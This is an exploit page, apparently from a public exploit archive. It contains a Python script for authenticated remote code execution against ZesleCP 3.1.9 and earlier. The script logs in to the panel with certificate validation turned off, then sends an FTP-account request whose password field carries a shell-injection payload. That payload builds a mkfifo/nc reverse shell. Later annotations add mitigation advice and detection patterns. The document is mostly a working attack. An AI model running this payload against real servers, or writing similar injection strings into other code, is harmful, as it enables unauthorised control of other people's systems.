## https://sploitus.com/exploit?id=PACKETSTORM:163920
# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)  
# Date: 27.08.2021  
# Author: Numan Türle  
# Vendor Homepage: https://zeslecp.com/  
# Software Link: https://zeslecp.com/  
# Version: <=3.1.9  
# https://www.youtube.com/watch?v=5lTDTEBVq-0  
  
#!/usr/bin/python3  
# -*- coding: utf-8 -*-  
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )  
# author: twitter.com/numanturle  
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD  
# https://www.youtube.com/watch?v=5lTDTEBVq-0  
  
  
import argparse,requests,warnings,json,random,string  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from cmd import Cmd  
  
# Suppress the InsecureRequestWarning that would otherwise be emitted for
# every request made with verify=False further down. With it silenced,
# nothing at runtime reminds the operator that the TLS peer is unauthenticated.
warnings.simplefilter(action='ignore', category=InsecureRequestWarning)
  
def init():
    """Parse the command line and pass the resulting namespace to exploit().

    All three options are mandatory: the panel host (-u/--host) and the
    credentials of an existing panel account (-l/--login, -p/--password).
    """
    cli = argparse.ArgumentParser(
        description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )'
    )
    cli.add_argument('-u', '--host', help='Host', type=str, required=True)
    cli.add_argument('-l', '--login', help='Username', type=str, required=True)
    cli.add_argument('-p', '--password', help='Password', type=str, required=True)
    exploit(cli.parse_args())
  
def exploit(args):
    """Log in to the panel and submit an FTP-account request with a crafted password.

    Proof of concept for the authenticated command injection reported against
    ZesleCP <= 3.1.9. ``args`` must expose ``host``, ``login`` and
    ``password``. Nothing is returned; progress is printed to stdout.

    Defender notes (the server-side code is not shown on this page, so the
    root cause is inferred from the request shape):
      * The ``ftp_password`` value closes a single-quoted string and appends
        further shell commands. For that to have any effect, the panel
        presumably interpolates the field into a shell command line without
        escaping it.
      * Mitigation on the server side: hand credentials to the account
        tooling as discrete arguments or via stdin instead of a shell string,
        and reject or escape quote and shell metacharacters in the field.
      * Detection: POST bodies to ``/core/ftp`` whose ``ftp_password``
        contains ``'``, ``;`` or ``|``, and the panel service spawning
        ``sh``, ``mkfifo`` or ``nc`` as child processes.
    """
    listen_ip = "0.0.0.0"
    listen_port = 1337

    http = requests.Session()
    # The admin port 2087 is hard-coded; only the host comes from the CLI.
    target = "https://{}:2087".format(args.host)
    username, password = args.login, args.password

    print("[+] Target {}".format(target))

    # NOTE(review): verify=False disables certificate validation, so the panel
    # credentials are sent to whatever endpoint answers on this address.
    auth_response = http.post(
        target + "/login",
        verify=False,
        json={"username": username, "password": password},
    )
    login_json = json.loads(auth_response.content)

    # Guard clause: stop when the panel rejects the credentials.
    if not login_json["success"]:
        print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
        return

    print("[+] Login successfully")
    print("[+] Creating ftp account")

    # Random 10-character account name, lower-case letters and digits.
    alphabet = string.ascii_lowercase + string.digits
    ftp_username = "".join(random.choices(alphabet, k=10))

    print("[+] Username : {}".format(ftp_username))
    print("[+] Send payload....")

    # The injection point is the password field, not the account name.
    injected_password = "1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip, listen_port)
    payload = {
        "ftp_user": ftp_username,
        "ftp_password": injected_password,
    }

    try:
        http.post(target + "/core/ftp", verify=False, json=payload, timeout=3)
    except requests.exceptions.ReadTimeout:
        # A read timeout is treated as an expected outcome; any other
        # exception propagates to the caller.
        pass

    # NOTE(review): printed whatever the server answered, so this line alone
    # is not evidence that the target is affected.
    print("[+] Successful")
  
# Run the command-line flow only when executed as a script; importing the
# module performs no network activity.
if __name__ == "__main__":
    init()